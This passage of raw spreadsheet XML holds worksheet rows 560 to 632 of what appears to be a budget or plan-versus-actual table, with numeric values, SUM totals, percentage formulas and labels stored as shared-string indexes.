      <c r="E560" s="173"/>
      <c r="F560" s="174"/>
      <c r="G560" s="172"/>
    </row>
    <row r="561" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A561" s="128" t="s">
        <v>756</v>
      </c>
      <c r="B561" s="100">
        <v>0</v>
      </c>
      <c r="C561" s="100"/>
      <c r="D561" s="100">
        <v>0</v>
      </c>
      <c r="E561" s="173"/>
      <c r="F561" s="174"/>
      <c r="G561" s="172"/>
    </row>
    <row r="562" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A562" s="128" t="s">
        <v>757</v>
      </c>
      <c r="B562" s="100">
        <v>0</v>
      </c>
      <c r="C562" s="100"/>
      <c r="D562" s="100">
        <v>0</v>
      </c>
      <c r="E562" s="173"/>
      <c r="F562" s="174"/>
      <c r="G562" s="172"/>
    </row>
    <row r="563" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A563" s="128" t="s">
        <v>758</v>
      </c>
      <c r="B563" s="100">
        <v>0</v>
      </c>
      <c r="C563" s="100"/>
      <c r="D563" s="100">
        <v>0</v>
      </c>
      <c r="E563" s="173"/>
      <c r="F563" s="174"/>
      <c r="G563" s="172"/>
    </row>
    <row r="564" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A564" s="128" t="s">
        <v>759</v>
      </c>
      <c r="B564" s="100">
        <v>0</v>
      </c>
      <c r="C564" s="100"/>
      <c r="D564" s="100">
        <v>0</v>
      </c>
      <c r="E564" s="173"/>
      <c r="F564" s="174"/>
      <c r="G564" s="172"/>
    </row>
    <row r="565" spans="1:7" ht="17.25" customHeight="1">
      <c r="A565" s="128" t="s">
        <v>760</v>
      </c>
      <c r="B565" s="100">
        <v>0</v>
      </c>
      <c r="C565" s="100"/>
      <c r="D565" s="100">
        <v>0</v>
      </c>
      <c r="E565" s="173"/>
      <c r="F565" s="174"/>
      <c r="G565" s="172"/>
    </row>
    <row r="566" spans="1:7" ht="17.25" customHeight="1">
      <c r="A566" s="128" t="s">
        <v>761</v>
      </c>
      <c r="B566" s="100">
        <v>7070</v>
      </c>
      <c r="C566" s="100"/>
      <c r="D566" s="100">
        <v>1273</v>
      </c>
      <c r="E566" s="173">
        <v>100</v>
      </c>
      <c r="F566" s="174"/>
      <c r="G566" s="172"/>
    </row>
    <row r="567" spans="1:7" ht="17.25" customHeight="1">
      <c r="A567" s="128" t="s">
        <v>762</v>
      </c>
      <c r="B567" s="100">
        <f>SUM(B568:B574)</f>
        <v>1808</v>
      </c>
      <c r="C567" s="100">
        <f>SUM(C568:C574)</f>
        <v>1808</v>
      </c>
      <c r="D567" s="100">
        <f>SUM(D568:D574)</f>
        <v>1827</v>
      </c>
      <c r="E567" s="173">
        <f>SUM(E568:E574)</f>
        <v>1827</v>
      </c>
      <c r="F567" s="174">
        <f>E567/C567*100</f>
        <v>101.05088495575221</v>
      </c>
      <c r="G567" s="172"/>
    </row>
    <row r="568" spans="1:7" ht="17.25" customHeight="1">
      <c r="A568" s="128" t="s">
        <v>763</v>
      </c>
      <c r="B568" s="100">
        <v>0</v>
      </c>
      <c r="C568" s="100"/>
      <c r="D568" s="100">
        <v>0</v>
      </c>
      <c r="E568" s="173"/>
      <c r="F568" s="174"/>
      <c r="G568" s="172"/>
    </row>
    <row r="569" spans="1:7" ht="17.25" customHeight="1">
      <c r="A569" s="128" t="s">
        <v>764</v>
      </c>
      <c r="B569" s="100">
        <v>0</v>
      </c>
      <c r="C569" s="100"/>
      <c r="D569" s="100">
        <v>0</v>
      </c>
      <c r="E569" s="173"/>
      <c r="F569" s="174"/>
      <c r="G569" s="172"/>
    </row>
    <row r="570" spans="1:7" ht="17.25" customHeight="1">
      <c r="A570" s="128" t="s">
        <v>765</v>
      </c>
      <c r="B570" s="100">
        <v>0</v>
      </c>
      <c r="C570" s="100"/>
      <c r="D570" s="100">
        <v>0</v>
      </c>
      <c r="E570" s="173"/>
      <c r="F570" s="174"/>
      <c r="G570" s="172"/>
    </row>
    <row r="571" spans="1:7" ht="17.25" customHeight="1">
      <c r="A571" s="128" t="s">
        <v>766</v>
      </c>
      <c r="B571" s="100">
        <v>592</v>
      </c>
      <c r="C571" s="100">
        <v>592</v>
      </c>
      <c r="D571" s="100">
        <v>581</v>
      </c>
      <c r="E571" s="173">
        <v>581</v>
      </c>
      <c r="F571" s="174">
        <f aca="true" t="shared" si="39" ref="F571:F576">E571/C571*100</f>
        <v>98.1418918918919</v>
      </c>
      <c r="G571" s="172"/>
    </row>
    <row r="572" spans="1:7" ht="17.25" customHeight="1">
      <c r="A572" s="128" t="s">
        <v>767</v>
      </c>
      <c r="B572" s="100">
        <v>0</v>
      </c>
      <c r="C572" s="100"/>
      <c r="D572" s="100">
        <v>0</v>
      </c>
      <c r="E572" s="173"/>
      <c r="F572" s="174"/>
      <c r="G572" s="172"/>
    </row>
    <row r="573" spans="1:7" ht="17.25" customHeight="1">
      <c r="A573" s="128" t="s">
        <v>768</v>
      </c>
      <c r="B573" s="100">
        <v>0</v>
      </c>
      <c r="C573" s="100"/>
      <c r="D573" s="100">
        <v>0</v>
      </c>
      <c r="E573" s="173"/>
      <c r="F573" s="174"/>
      <c r="G573" s="172"/>
    </row>
    <row r="574" spans="1:7" ht="17.25" customHeight="1">
      <c r="A574" s="128" t="s">
        <v>769</v>
      </c>
      <c r="B574" s="100">
        <v>1216</v>
      </c>
      <c r="C574" s="100">
        <v>1216</v>
      </c>
      <c r="D574" s="100">
        <v>1246</v>
      </c>
      <c r="E574" s="173">
        <v>1246</v>
      </c>
      <c r="F574" s="174">
        <f t="shared" si="39"/>
        <v>102.4671052631579</v>
      </c>
      <c r="G574" s="172"/>
    </row>
    <row r="575" spans="1:7" ht="17.25" customHeight="1">
      <c r="A575" s="128" t="s">
        <v>770</v>
      </c>
      <c r="B575" s="100">
        <f>SUM(B576:B581)</f>
        <v>3021</v>
      </c>
      <c r="C575" s="100">
        <f>SUM(C576:C581)</f>
        <v>1242</v>
      </c>
      <c r="D575" s="100">
        <f>SUM(D576:D581)</f>
        <v>2571</v>
      </c>
      <c r="E575" s="173">
        <f>SUM(E576:E581)</f>
        <v>1219</v>
      </c>
      <c r="F575" s="174">
        <f t="shared" si="39"/>
        <v>98.14814814814815</v>
      </c>
      <c r="G575" s="172"/>
    </row>
    <row r="576" spans="1:7" ht="17.25" customHeight="1">
      <c r="A576" s="128" t="s">
        <v>771</v>
      </c>
      <c r="B576" s="100">
        <v>30</v>
      </c>
      <c r="C576" s="100">
        <v>30</v>
      </c>
      <c r="D576" s="100">
        <v>30</v>
      </c>
      <c r="E576" s="173">
        <v>30</v>
      </c>
      <c r="F576" s="174">
        <f t="shared" si="39"/>
        <v>100</v>
      </c>
      <c r="G576" s="172"/>
    </row>
    <row r="577" spans="1:7" ht="17.25" customHeight="1">
      <c r="A577" s="128" t="s">
        <v>772</v>
      </c>
      <c r="B577" s="100">
        <v>1079</v>
      </c>
      <c r="C577" s="100"/>
      <c r="D577" s="100">
        <v>107</v>
      </c>
      <c r="E577" s="173"/>
      <c r="F577" s="174"/>
      <c r="G577" s="172"/>
    </row>
    <row r="578" spans="1:7" ht="17.25" customHeight="1">
      <c r="A578" s="128" t="s">
        <v>773</v>
      </c>
      <c r="B578" s="100">
        <v>108</v>
      </c>
      <c r="C578" s="100">
        <v>74</v>
      </c>
      <c r="D578" s="100">
        <v>174</v>
      </c>
      <c r="E578" s="173">
        <v>78</v>
      </c>
      <c r="F578" s="174">
        <f aca="true" t="shared" si="40" ref="F578:F582">E578/C578*100</f>
        <v>105.40540540540539</v>
      </c>
      <c r="G578" s="172"/>
    </row>
    <row r="579" spans="1:7" ht="17.25" customHeight="1">
      <c r="A579" s="128" t="s">
        <v>774</v>
      </c>
      <c r="B579" s="100">
        <v>0</v>
      </c>
      <c r="C579" s="100"/>
      <c r="D579" s="100">
        <v>377</v>
      </c>
      <c r="E579" s="173"/>
      <c r="F579" s="174"/>
      <c r="G579" s="172"/>
    </row>
    <row r="580" spans="1:7" ht="17.25" customHeight="1">
      <c r="A580" s="128" t="s">
        <v>775</v>
      </c>
      <c r="B580" s="100">
        <f>666+1138</f>
        <v>1804</v>
      </c>
      <c r="C580" s="100">
        <v>1138</v>
      </c>
      <c r="D580" s="100">
        <v>1120</v>
      </c>
      <c r="E580" s="173">
        <v>1111</v>
      </c>
      <c r="F580" s="174">
        <f t="shared" si="40"/>
        <v>97.6274165202109</v>
      </c>
      <c r="G580" s="172"/>
    </row>
    <row r="581" spans="1:7" ht="17.25" customHeight="1">
      <c r="A581" s="128" t="s">
        <v>776</v>
      </c>
      <c r="B581" s="100">
        <v>0</v>
      </c>
      <c r="C581" s="100"/>
      <c r="D581" s="100">
        <v>763</v>
      </c>
      <c r="E581" s="173"/>
      <c r="F581" s="174"/>
      <c r="G581" s="172"/>
    </row>
    <row r="582" spans="1:7" ht="17.25" customHeight="1">
      <c r="A582" s="128" t="s">
        <v>777</v>
      </c>
      <c r="B582" s="100">
        <f>SUM(B583:B589)</f>
        <v>544</v>
      </c>
      <c r="C582" s="100">
        <f>SUM(C583:C589)</f>
        <v>544</v>
      </c>
      <c r="D582" s="100">
        <f>SUM(D583:D589)</f>
        <v>560</v>
      </c>
      <c r="E582" s="173">
        <f>SUM(E583:E589)</f>
        <v>560</v>
      </c>
      <c r="F582" s="174">
        <f t="shared" si="40"/>
        <v>102.94117647058823</v>
      </c>
      <c r="G582" s="172"/>
    </row>
    <row r="583" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A583" s="128" t="s">
        <v>778</v>
      </c>
      <c r="B583" s="100">
        <v>0</v>
      </c>
      <c r="C583" s="100"/>
      <c r="D583" s="100">
        <v>0</v>
      </c>
      <c r="E583" s="173"/>
      <c r="F583" s="174"/>
      <c r="G583" s="172"/>
    </row>
    <row r="584" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A584" s="128" t="s">
        <v>779</v>
      </c>
      <c r="B584" s="100">
        <v>0</v>
      </c>
      <c r="C584" s="100"/>
      <c r="D584" s="100">
        <v>0</v>
      </c>
      <c r="E584" s="173"/>
      <c r="F584" s="174"/>
      <c r="G584" s="172"/>
    </row>
    <row r="585" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A585" s="128" t="s">
        <v>780</v>
      </c>
      <c r="B585" s="100">
        <v>0</v>
      </c>
      <c r="C585" s="100"/>
      <c r="D585" s="100">
        <v>0</v>
      </c>
      <c r="E585" s="173"/>
      <c r="F585" s="174"/>
      <c r="G585" s="172"/>
    </row>
    <row r="586" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A586" s="128" t="s">
        <v>781</v>
      </c>
      <c r="B586" s="100">
        <v>0</v>
      </c>
      <c r="C586" s="100"/>
      <c r="D586" s="100">
        <v>0</v>
      </c>
      <c r="E586" s="173"/>
      <c r="F586" s="174"/>
      <c r="G586" s="172"/>
    </row>
    <row r="587" spans="1:7" ht="17.25" customHeight="1">
      <c r="A587" s="128" t="s">
        <v>782</v>
      </c>
      <c r="B587" s="100">
        <v>544</v>
      </c>
      <c r="C587" s="100">
        <v>544</v>
      </c>
      <c r="D587" s="100">
        <v>560</v>
      </c>
      <c r="E587" s="173">
        <v>560</v>
      </c>
      <c r="F587" s="174">
        <f aca="true" t="shared" si="41" ref="F587:F591">E587/C587*100</f>
        <v>102.94117647058823</v>
      </c>
      <c r="G587" s="172"/>
    </row>
    <row r="588" spans="1:7" ht="17.25" customHeight="1">
      <c r="A588" s="128" t="s">
        <v>783</v>
      </c>
      <c r="B588" s="100"/>
      <c r="C588" s="100"/>
      <c r="D588" s="100">
        <v>0</v>
      </c>
      <c r="E588" s="173"/>
      <c r="F588" s="174"/>
      <c r="G588" s="172"/>
    </row>
    <row r="589" spans="1:7" ht="17.25" customHeight="1">
      <c r="A589" s="128" t="s">
        <v>784</v>
      </c>
      <c r="B589" s="100">
        <v>0</v>
      </c>
      <c r="C589" s="100"/>
      <c r="D589" s="100">
        <v>0</v>
      </c>
      <c r="E589" s="173"/>
      <c r="F589" s="174"/>
      <c r="G589" s="172"/>
    </row>
    <row r="590" spans="1:7" ht="17.25" customHeight="1">
      <c r="A590" s="128" t="s">
        <v>785</v>
      </c>
      <c r="B590" s="100">
        <f>SUM(B591:B598)</f>
        <v>2267</v>
      </c>
      <c r="C590" s="100">
        <f>SUM(C591:C598)</f>
        <v>443</v>
      </c>
      <c r="D590" s="100">
        <f>SUM(D591:D598)</f>
        <v>1917</v>
      </c>
      <c r="E590" s="173">
        <f>SUM(E591:E598)</f>
        <v>395</v>
      </c>
      <c r="F590" s="174">
        <f t="shared" si="41"/>
        <v>89.1647855530474</v>
      </c>
      <c r="G590" s="172"/>
    </row>
    <row r="591" spans="1:7" ht="17.25" customHeight="1">
      <c r="A591" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B591" s="100">
        <v>214</v>
      </c>
      <c r="C591" s="100">
        <v>214</v>
      </c>
      <c r="D591" s="100">
        <v>194</v>
      </c>
      <c r="E591" s="173">
        <v>194</v>
      </c>
      <c r="F591" s="174">
        <f t="shared" si="41"/>
        <v>90.65420560747664</v>
      </c>
      <c r="G591" s="172"/>
    </row>
    <row r="592" spans="1:7" ht="17.25" customHeight="1">
      <c r="A592" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B592" s="100">
        <v>0</v>
      </c>
      <c r="C592" s="100"/>
      <c r="D592" s="100">
        <v>0</v>
      </c>
      <c r="E592" s="173"/>
      <c r="F592" s="174"/>
      <c r="G592" s="172"/>
    </row>
    <row r="593" spans="1:7" ht="17.25" customHeight="1">
      <c r="A593" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B593" s="100">
        <v>100</v>
      </c>
      <c r="C593" s="100">
        <v>100</v>
      </c>
      <c r="D593" s="100">
        <v>50</v>
      </c>
      <c r="E593" s="173">
        <v>50</v>
      </c>
      <c r="F593" s="174">
        <f>E593/C593*100</f>
        <v>50</v>
      </c>
      <c r="G593" s="172"/>
    </row>
    <row r="594" spans="1:7" ht="17.25" customHeight="1">
      <c r="A594" s="128" t="s">
        <v>786</v>
      </c>
      <c r="B594" s="100">
        <v>273</v>
      </c>
      <c r="C594" s="100">
        <v>129</v>
      </c>
      <c r="D594" s="100">
        <v>151</v>
      </c>
      <c r="E594" s="173">
        <v>151</v>
      </c>
      <c r="F594" s="174">
        <f>E594/C594*100</f>
        <v>117.05426356589147</v>
      </c>
      <c r="G594" s="172"/>
    </row>
    <row r="595" spans="1:7" ht="17.25" customHeight="1">
      <c r="A595" s="128" t="s">
        <v>787</v>
      </c>
      <c r="B595" s="100">
        <v>0</v>
      </c>
      <c r="C595" s="100"/>
      <c r="D595" s="100">
        <v>0</v>
      </c>
      <c r="E595" s="173"/>
      <c r="F595" s="174"/>
      <c r="G595" s="172"/>
    </row>
    <row r="596" spans="1:7" ht="17.25" customHeight="1">
      <c r="A596" s="128" t="s">
        <v>788</v>
      </c>
      <c r="B596" s="100">
        <v>0</v>
      </c>
      <c r="C596" s="100"/>
      <c r="D596" s="100">
        <v>0</v>
      </c>
      <c r="E596" s="173"/>
      <c r="F596" s="174"/>
      <c r="G596" s="172"/>
    </row>
    <row r="597" spans="1:7" ht="17.25" customHeight="1">
      <c r="A597" s="128" t="s">
        <v>789</v>
      </c>
      <c r="B597" s="100">
        <v>0</v>
      </c>
      <c r="C597" s="100"/>
      <c r="D597" s="100">
        <v>0</v>
      </c>
      <c r="E597" s="173"/>
      <c r="F597" s="174"/>
      <c r="G597" s="172"/>
    </row>
    <row r="598" spans="1:7" ht="17.25" customHeight="1">
      <c r="A598" s="128" t="s">
        <v>790</v>
      </c>
      <c r="B598" s="100">
        <v>1680</v>
      </c>
      <c r="C598" s="100"/>
      <c r="D598" s="100">
        <v>1522</v>
      </c>
      <c r="E598" s="173"/>
      <c r="F598" s="174"/>
      <c r="G598" s="172"/>
    </row>
    <row r="599" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A599" s="128" t="s">
        <v>791</v>
      </c>
      <c r="B599" s="100">
        <f>SUM(B600:B603)</f>
        <v>0</v>
      </c>
      <c r="C599" s="100">
        <f>SUM(C600:C603)</f>
        <v>0</v>
      </c>
      <c r="D599" s="100">
        <f>SUM(D600:D603)</f>
        <v>0</v>
      </c>
      <c r="E599" s="173">
        <f>SUM(E600:E603)</f>
        <v>0</v>
      </c>
      <c r="F599" s="174"/>
      <c r="G599" s="172"/>
    </row>
    <row r="600" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A600" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B600" s="100"/>
      <c r="C600" s="100"/>
      <c r="D600" s="100">
        <v>0</v>
      </c>
      <c r="E600" s="173"/>
      <c r="F600" s="174"/>
      <c r="G600" s="172"/>
    </row>
    <row r="601" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A601" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B601" s="100"/>
      <c r="C601" s="100"/>
      <c r="D601" s="100">
        <v>0</v>
      </c>
      <c r="E601" s="173"/>
      <c r="F601" s="174"/>
      <c r="G601" s="172"/>
    </row>
    <row r="602" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A602" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B602" s="100"/>
      <c r="C602" s="100"/>
      <c r="D602" s="100">
        <v>0</v>
      </c>
      <c r="E602" s="173"/>
      <c r="F602" s="174"/>
      <c r="G602" s="172"/>
    </row>
    <row r="603" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A603" s="128" t="s">
        <v>792</v>
      </c>
      <c r="B603" s="100"/>
      <c r="C603" s="100"/>
      <c r="D603" s="100">
        <v>0</v>
      </c>
      <c r="E603" s="173"/>
      <c r="F603" s="174"/>
      <c r="G603" s="172"/>
    </row>
    <row r="604" spans="1:7" ht="17.25" customHeight="1">
      <c r="A604" s="128" t="s">
        <v>793</v>
      </c>
      <c r="B604" s="100">
        <f>SUM(B605:B606)</f>
        <v>3867</v>
      </c>
      <c r="C604" s="100">
        <f>SUM(C605:C606)</f>
        <v>3867</v>
      </c>
      <c r="D604" s="100">
        <f>SUM(D605:D606)</f>
        <v>3867</v>
      </c>
      <c r="E604" s="173">
        <f>SUM(E605:E606)</f>
        <v>3867</v>
      </c>
      <c r="F604" s="174">
        <f>E604/C604*100</f>
        <v>100</v>
      </c>
      <c r="G604" s="172"/>
    </row>
    <row r="605" spans="1:7" ht="17.25" customHeight="1">
      <c r="A605" s="128" t="s">
        <v>794</v>
      </c>
      <c r="B605" s="100">
        <v>3867</v>
      </c>
      <c r="C605" s="100">
        <v>3867</v>
      </c>
      <c r="D605" s="100">
        <v>3867</v>
      </c>
      <c r="E605" s="173">
        <v>3867</v>
      </c>
      <c r="F605" s="174">
        <f>E605/C605*100</f>
        <v>100</v>
      </c>
      <c r="G605" s="172"/>
    </row>
    <row r="606" spans="1:7" ht="17.25" customHeight="1">
      <c r="A606" s="128" t="s">
        <v>795</v>
      </c>
      <c r="B606" s="100"/>
      <c r="C606" s="100"/>
      <c r="D606" s="100">
        <v>0</v>
      </c>
      <c r="E606" s="173"/>
      <c r="F606" s="174"/>
      <c r="G606" s="172"/>
    </row>
    <row r="607" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A607" s="128" t="s">
        <v>796</v>
      </c>
      <c r="B607" s="100">
        <f>SUM(B608:B609)</f>
        <v>0</v>
      </c>
      <c r="C607" s="100">
        <f>SUM(C608:C609)</f>
        <v>0</v>
      </c>
      <c r="D607" s="100">
        <f>SUM(D608:D609)</f>
        <v>0</v>
      </c>
      <c r="E607" s="173">
        <f>SUM(E608:E609)</f>
        <v>0</v>
      </c>
      <c r="F607" s="174"/>
      <c r="G607" s="172"/>
    </row>
    <row r="608" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A608" s="128" t="s">
        <v>797</v>
      </c>
      <c r="B608" s="100"/>
      <c r="C608" s="100"/>
      <c r="D608" s="100">
        <v>0</v>
      </c>
      <c r="E608" s="173"/>
      <c r="F608" s="174"/>
      <c r="G608" s="172"/>
    </row>
    <row r="609" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A609" s="128" t="s">
        <v>798</v>
      </c>
      <c r="B609" s="100"/>
      <c r="C609" s="100"/>
      <c r="D609" s="100">
        <v>0</v>
      </c>
      <c r="E609" s="173"/>
      <c r="F609" s="174"/>
      <c r="G609" s="172"/>
    </row>
    <row r="610" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A610" s="128" t="s">
        <v>799</v>
      </c>
      <c r="B610" s="100">
        <f>SUM(B611:B612)</f>
        <v>0</v>
      </c>
      <c r="C610" s="100">
        <f>SUM(C611:C612)</f>
        <v>0</v>
      </c>
      <c r="D610" s="100">
        <f>SUM(D611:D612)</f>
        <v>0</v>
      </c>
      <c r="E610" s="173">
        <f>SUM(E611:E612)</f>
        <v>0</v>
      </c>
      <c r="F610" s="174"/>
      <c r="G610" s="172"/>
    </row>
    <row r="611" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A611" s="128" t="s">
        <v>800</v>
      </c>
      <c r="B611" s="100"/>
      <c r="C611" s="100"/>
      <c r="D611" s="100">
        <v>0</v>
      </c>
      <c r="E611" s="173"/>
      <c r="F611" s="174"/>
      <c r="G611" s="172"/>
    </row>
    <row r="612" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A612" s="128" t="s">
        <v>801</v>
      </c>
      <c r="B612" s="100"/>
      <c r="C612" s="100"/>
      <c r="D612" s="100">
        <v>0</v>
      </c>
      <c r="E612" s="173"/>
      <c r="F612" s="174"/>
      <c r="G612" s="172"/>
    </row>
    <row r="613" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A613" s="128" t="s">
        <v>802</v>
      </c>
      <c r="B613" s="100">
        <f>SUM(B614:B615)</f>
        <v>0</v>
      </c>
      <c r="C613" s="100">
        <f>SUM(C614:C615)</f>
        <v>0</v>
      </c>
      <c r="D613" s="100">
        <f>SUM(D614:D615)</f>
        <v>0</v>
      </c>
      <c r="E613" s="173">
        <f>SUM(E614:E615)</f>
        <v>0</v>
      </c>
      <c r="F613" s="174"/>
      <c r="G613" s="172"/>
    </row>
    <row r="614" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A614" s="128" t="s">
        <v>803</v>
      </c>
      <c r="B614" s="100"/>
      <c r="C614" s="100"/>
      <c r="D614" s="100">
        <v>0</v>
      </c>
      <c r="E614" s="173"/>
      <c r="F614" s="174"/>
      <c r="G614" s="172"/>
    </row>
    <row r="615" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A615" s="128" t="s">
        <v>804</v>
      </c>
      <c r="B615" s="100"/>
      <c r="C615" s="100"/>
      <c r="D615" s="100">
        <v>0</v>
      </c>
      <c r="E615" s="173"/>
      <c r="F615" s="174"/>
      <c r="G615" s="172"/>
    </row>
    <row r="616" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A616" s="128" t="s">
        <v>805</v>
      </c>
      <c r="B616" s="100">
        <f>SUM(B617:B618)</f>
        <v>0</v>
      </c>
      <c r="C616" s="100">
        <f>SUM(C617:C618)</f>
        <v>0</v>
      </c>
      <c r="D616" s="100">
        <f>SUM(D617:D618)</f>
        <v>0</v>
      </c>
      <c r="E616" s="173">
        <f>SUM(E617:E618)</f>
        <v>0</v>
      </c>
      <c r="F616" s="174"/>
      <c r="G616" s="172"/>
    </row>
    <row r="617" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A617" s="128" t="s">
        <v>806</v>
      </c>
      <c r="B617" s="100"/>
      <c r="C617" s="100"/>
      <c r="D617" s="100">
        <v>0</v>
      </c>
      <c r="E617" s="173"/>
      <c r="F617" s="174"/>
      <c r="G617" s="172"/>
    </row>
    <row r="618" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A618" s="128" t="s">
        <v>807</v>
      </c>
      <c r="B618" s="100"/>
      <c r="C618" s="100"/>
      <c r="D618" s="100">
        <v>0</v>
      </c>
      <c r="E618" s="173"/>
      <c r="F618" s="174"/>
      <c r="G618" s="172"/>
    </row>
    <row r="619" spans="1:7" ht="17.25" customHeight="1">
      <c r="A619" s="128" t="s">
        <v>808</v>
      </c>
      <c r="B619" s="100">
        <f>SUM(B620:B622)</f>
        <v>0</v>
      </c>
      <c r="C619" s="100">
        <f>SUM(C620:C622)</f>
        <v>0</v>
      </c>
      <c r="D619" s="100">
        <f>SUM(D620:D622)</f>
        <v>12882</v>
      </c>
      <c r="E619" s="173">
        <f>SUM(E620:E622)</f>
        <v>0</v>
      </c>
      <c r="F619" s="174"/>
      <c r="G619" s="172"/>
    </row>
    <row r="620" spans="1:7" ht="17.25" customHeight="1">
      <c r="A620" s="128" t="s">
        <v>809</v>
      </c>
      <c r="B620" s="100"/>
      <c r="C620" s="100"/>
      <c r="D620" s="100">
        <v>0</v>
      </c>
      <c r="E620" s="173"/>
      <c r="F620" s="174"/>
      <c r="G620" s="172"/>
    </row>
    <row r="621" spans="1:7" ht="17.25" customHeight="1">
      <c r="A621" s="128" t="s">
        <v>810</v>
      </c>
      <c r="B621" s="100"/>
      <c r="C621" s="100"/>
      <c r="D621" s="100">
        <v>12882</v>
      </c>
      <c r="E621" s="173"/>
      <c r="F621" s="174"/>
      <c r="G621" s="172"/>
    </row>
    <row r="622" spans="1:7" ht="17.25" customHeight="1">
      <c r="A622" s="128" t="s">
        <v>811</v>
      </c>
      <c r="B622" s="100"/>
      <c r="C622" s="100"/>
      <c r="D622" s="100">
        <v>0</v>
      </c>
      <c r="E622" s="173"/>
      <c r="F622" s="174"/>
      <c r="G622" s="172"/>
    </row>
    <row r="623" spans="1:7" ht="17.25" customHeight="1">
      <c r="A623" s="128" t="s">
        <v>812</v>
      </c>
      <c r="B623" s="100">
        <f>SUM(B624:B627)</f>
        <v>720</v>
      </c>
      <c r="C623" s="100">
        <f>SUM(C624:C627)</f>
        <v>720</v>
      </c>
      <c r="D623" s="100">
        <f>SUM(D624:D627)</f>
        <v>720</v>
      </c>
      <c r="E623" s="173">
        <f>SUM(E624:E627)</f>
        <v>720</v>
      </c>
      <c r="F623" s="174"/>
      <c r="G623" s="172"/>
    </row>
    <row r="624" spans="1:7" ht="17.25" customHeight="1">
      <c r="A624" s="128" t="s">
        <v>813</v>
      </c>
      <c r="B624" s="100">
        <v>314</v>
      </c>
      <c r="C624" s="100">
        <v>314</v>
      </c>
      <c r="D624" s="100">
        <v>314</v>
      </c>
      <c r="E624" s="173">
        <v>314</v>
      </c>
      <c r="F624" s="174"/>
      <c r="G624" s="172"/>
    </row>
    <row r="625" spans="1:7" ht="17.25" customHeight="1">
      <c r="A625" s="128" t="s">
        <v>814</v>
      </c>
      <c r="B625" s="100">
        <v>116</v>
      </c>
      <c r="C625" s="100">
        <v>116</v>
      </c>
      <c r="D625" s="100">
        <v>116</v>
      </c>
      <c r="E625" s="173">
        <v>116</v>
      </c>
      <c r="F625" s="174"/>
      <c r="G625" s="172"/>
    </row>
    <row r="626" spans="1:7" ht="17.25" customHeight="1">
      <c r="A626" s="128" t="s">
        <v>815</v>
      </c>
      <c r="B626" s="100">
        <v>290</v>
      </c>
      <c r="C626" s="100">
        <v>290</v>
      </c>
      <c r="D626" s="100">
        <v>290</v>
      </c>
      <c r="E626" s="173">
        <v>290</v>
      </c>
      <c r="F626" s="174"/>
      <c r="G626" s="172"/>
    </row>
    <row r="627" spans="1:7" ht="17.25" customHeight="1">
      <c r="A627" s="128" t="s">
        <v>816</v>
      </c>
      <c r="B627" s="100"/>
      <c r="C627" s="100"/>
      <c r="D627" s="100">
        <v>0</v>
      </c>
      <c r="E627" s="173"/>
      <c r="F627" s="174"/>
      <c r="G627" s="172"/>
    </row>
    <row r="628" spans="1:7" ht="17.25" customHeight="1">
      <c r="A628" s="128" t="s">
        <v>817</v>
      </c>
      <c r="B628" s="100">
        <f>SUM(B629:B635)</f>
        <v>0</v>
      </c>
      <c r="C628" s="100">
        <f>SUM(C629:C635)</f>
        <v>0</v>
      </c>
      <c r="D628" s="100">
        <f>SUM(D629:D635)</f>
        <v>444</v>
      </c>
      <c r="E628" s="173">
        <f>SUM(E629:E635)</f>
        <v>444</v>
      </c>
      <c r="F628" s="174"/>
      <c r="G628" s="172"/>
    </row>
    <row r="629" spans="1:7" ht="17.25" customHeight="1">
      <c r="A629" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B629" s="100"/>
      <c r="C629" s="100"/>
      <c r="D629" s="100">
        <v>224</v>
      </c>
      <c r="E629" s="173">
        <v>224</v>
      </c>
      <c r="F629" s="174"/>
      <c r="G629" s="172"/>
    </row>
    <row r="630" spans="1:7" ht="17.25" customHeight="1">
      <c r="A630" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B630" s="100"/>
      <c r="C630" s="100"/>
      <c r="D630" s="100">
        <v>0</v>
      </c>
      <c r="E630" s="173"/>
      <c r="F630" s="174"/>
      <c r="G630" s="172"/>
    </row>
    <row r="631" spans="1:7" ht="17.25" customHeight="1">
      <c r="A631" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B631" s="100"/>
      <c r="C631" s="100"/>
      <c r="D631" s="100">
        <v>0</v>
      </c>
      <c r="E631" s="173"/>
      <c r="F631" s="174"/>
      <c r="G631" s="172"/>
    </row>
    <row r="632" spans="1:7" ht="17.25" customHeight="1">
      <c r="A632" s="128" t="s">
        <v>818</v>
      </c>
      <c r="B632" s="100"/>
      <c r="C632" s="100"/>
      <c r="D632" s="100">
        <v>70</v>
      </c>
      <c r="E632" s="173">
        <v>70</v>
      </c>
      <c r="F632" s="174"/>
      <c r="G632" s="172"/>
